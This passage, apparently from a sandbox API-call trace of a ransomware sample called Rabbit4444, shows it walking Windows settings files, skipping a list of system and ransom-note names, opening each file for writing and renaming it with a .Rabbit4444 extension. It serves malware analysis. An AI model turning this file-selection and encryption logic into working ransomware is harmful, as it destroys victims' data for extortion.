"c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_keyboard_iscompatibilitykeyboardenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsCompatibilityKeyboardEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_keyboard_iscompatibilitykeyboardenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.423] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d7ec0e4, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2d7ec0e4, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x238f74d9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x519, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Keyboard_IsDoubleTapSpaceEnabled.settingcontent-ms", cAlternateFileName="AAEECF~1.SET")) returned 1 [0057.423] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsDoubleTapSpaceEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.423] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsDoubleTapSpaceEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.423] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsDoubleTapSpaceEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.423] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsDoubleTapSpaceEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.423] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsDoubleTapSpaceEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.423] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsDoubleTapSpaceEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.423] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsDoubleTapSpaceEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.423] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsDoubleTapSpaceEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.423] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsDoubleTapSpaceEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.423] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsDoubleTapSpaceEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.423] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsDoubleTapSpaceEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.423] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Keyboard_IsDoubleTapSpaceEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Keyboard_IsDoubleTapSpaceEnabled.settingcontent-ms") returned="AAA_SystemSettings_Keyboard_IsDoubleTapSpaceEnabled.settingcontent-ms" [0057.424] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsDoubleTapSpaceEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.424] lstrlenW (lpString="AAA_SystemSettings_Keyboard_IsDoubleTapSpaceEnabled.settingcontent-ms") returned 69 [0057.424] lstrlenW (lpString="Rabbit4444") returned 10 [0057.424] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.424] lstrlenW (lpString=".dll") returned 4 [0057.424] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.424] lstrlenW (lpString=".lnk") returned 4 [0057.424] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.424] lstrlenW (lpString=".ini") returned 4 [0057.424] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.424] lstrlenW (lpString=".sys") returned 4 [0057.424] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.424] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsDoubleTapSpaceEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_keyboard_isdoubletapspaceenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.424] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.424] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14873515127) returned 1 [0057.424] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1305) returned 1 [0057.425] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0057.425] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0057.425] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x298 [0057.426] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x70000 [0057.426] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.426] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0057.426] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.426] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0057.426] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.427] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0057.427] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.427] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0057.427] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14873760119) returned 1 [0057.427] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0057.427] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0057.427] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.427] CloseHandle (hObject=0x298) returned 1 [0057.427] CloseHandle (hObject=0x278) returned 1 [0057.427] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsDoubleTapSpaceEnabled.settingcontent-ms.Rabbit4444") returned 197 [0057.427] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsDoubleTapSpaceEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_keyboard_isdoubletapspaceenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsDoubleTapSpaceEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_keyboard_isdoubletapspaceenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.428] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d9dbf7f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2d9dbf7f, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23884dd1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x522, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Keyboard_IsKeyAudioFeedbackEnabled.settingcontent-ms", cAlternateFileName="AA28DA~1.SET")) returned 1 [0057.428] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsKeyAudioFeedbackEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.428] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsKeyAudioFeedbackEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.428] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsKeyAudioFeedbackEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.428] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsKeyAudioFeedbackEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.428] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsKeyAudioFeedbackEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.428] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsKeyAudioFeedbackEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.428] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsKeyAudioFeedbackEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.428] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsKeyAudioFeedbackEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.428] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsKeyAudioFeedbackEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.428] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsKeyAudioFeedbackEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.428] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsKeyAudioFeedbackEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.428] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Keyboard_IsKeyAudioFeedbackEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Keyboard_IsKeyAudioFeedbackEnabled.settingcontent-ms") returned="AAA_SystemSettings_Keyboard_IsKeyAudioFeedbackEnabled.settingcontent-ms" [0057.428] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsKeyAudioFeedbackEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.428] lstrlenW (lpString="AAA_SystemSettings_Keyboard_IsKeyAudioFeedbackEnabled.settingcontent-ms") returned 71 [0057.428] lstrlenW (lpString="Rabbit4444") returned 10 [0057.428] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.428] lstrlenW (lpString=".dll") returned 4 [0057.429] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.429] lstrlenW (lpString=".lnk") returned 4 [0057.429] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.429] lstrlenW (lpString=".ini") returned 4 [0057.429] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.429] lstrlenW (lpString=".sys") returned 4 [0057.429] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.429] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsKeyAudioFeedbackEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_keyboard_iskeyaudiofeedbackenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.429] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.429] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14873975446) returned 1 [0057.429] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1314) returned 1 [0057.429] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0057.429] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0057.429] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x830, lpName=0x0) returned 0x298 [0057.431] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x830) returned 0x70000 [0057.432] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.432] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0057.432] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.432] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0057.432] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.432] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0057.432] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.432] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0057.432] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14874295472) returned 1 [0057.432] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0057.432] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0057.432] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.432] CloseHandle (hObject=0x298) returned 1 [0057.432] CloseHandle (hObject=0x278) returned 1 [0057.433] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsKeyAudioFeedbackEnabled.settingcontent-ms.Rabbit4444") returned 199 [0057.433] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsKeyAudioFeedbackEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_keyboard_iskeyaudiofeedbackenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsKeyAudioFeedbackEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_keyboard_iskeyaudiofeedbackenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.433] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2db7f98e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2db7f98e, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x54b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Keyboard_IsPredictionSpaceInsertionEnabled.settingcontent-ms", cAlternateFileName="AA2377~1.SET")) returned 1 [0057.433] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsPredictionSpaceInsertionEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.433] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsPredictionSpaceInsertionEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.433] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsPredictionSpaceInsertionEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.433] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsPredictionSpaceInsertionEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.433] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsPredictionSpaceInsertionEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.433] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsPredictionSpaceInsertionEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.433] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsPredictionSpaceInsertionEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.434] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsPredictionSpaceInsertionEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.434] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsPredictionSpaceInsertionEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.434] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsPredictionSpaceInsertionEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.434] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsPredictionSpaceInsertionEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.434] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Keyboard_IsPredictionSpaceInsertionEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Keyboard_IsPredictionSpaceInsertionEnabled.settingcontent-ms") returned="AAA_SystemSettings_Keyboard_IsPredictionSpaceInsertionEnabled.settingcontent-ms" [0057.434] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsPredictionSpaceInsertionEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.434] lstrlenW (lpString="AAA_SystemSettings_Keyboard_IsPredictionSpaceInsertionEnabled.settingcontent-ms") returned 79 [0057.434] lstrlenW (lpString="Rabbit4444") returned 10 [0057.434] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.434] lstrlenW (lpString=".dll") returned 4 [0057.434] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.434] lstrlenW (lpString=".lnk") returned 4 [0057.434] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.434] lstrlenW (lpString=".ini") returned 4 [0057.434] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.434] lstrlenW (lpString=".sys") returned 4 [0057.434] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.434] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsPredictionSpaceInsertionEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_keyboard_ispredictionspaceinsertionenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.435] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.435] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14874532687) returned 1 [0057.435] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1355) returned 1 [0057.435] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0057.435] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0057.435] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x850, lpName=0x0) returned 0x298 [0057.436] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x850) returned 0x70000 [0057.437] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.437] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0057.437] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.437] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0057.437] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.437] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0057.437] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.437] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0057.437] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14874788371) returned 1 [0057.437] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0057.437] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0057.437] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.437] CloseHandle (hObject=0x298) returned 1 [0057.437] CloseHandle (hObject=0x278) returned 1 [0057.437] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsPredictionSpaceInsertionEnabled.settingcontent-ms.Rabbit4444") returned 207 [0057.438] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsPredictionSpaceInsertionEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_keyboard_ispredictionspaceinsertionenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsPredictionSpaceInsertionEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_keyboard_ispredictionspaceinsertionenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.438] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2de2e3a6, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2de2e3a6, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a287a5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Keyboard_IsShiftLockEnabled.settingcontent-ms", cAlternateFileName="AA8C87~1.SET")) returned 1 [0057.438] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsShiftLockEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.438] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsShiftLockEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.438] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsShiftLockEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.438] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsShiftLockEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.438] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsShiftLockEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.438] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsShiftLockEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.438] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsShiftLockEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.438] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsShiftLockEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.439] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsShiftLockEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.439] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsShiftLockEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.439] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsShiftLockEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.439] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Keyboard_IsShiftLockEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Keyboard_IsShiftLockEnabled.settingcontent-ms") returned="AAA_SystemSettings_Keyboard_IsShiftLockEnabled.settingcontent-ms" [0057.439] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsShiftLockEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.439] lstrlenW 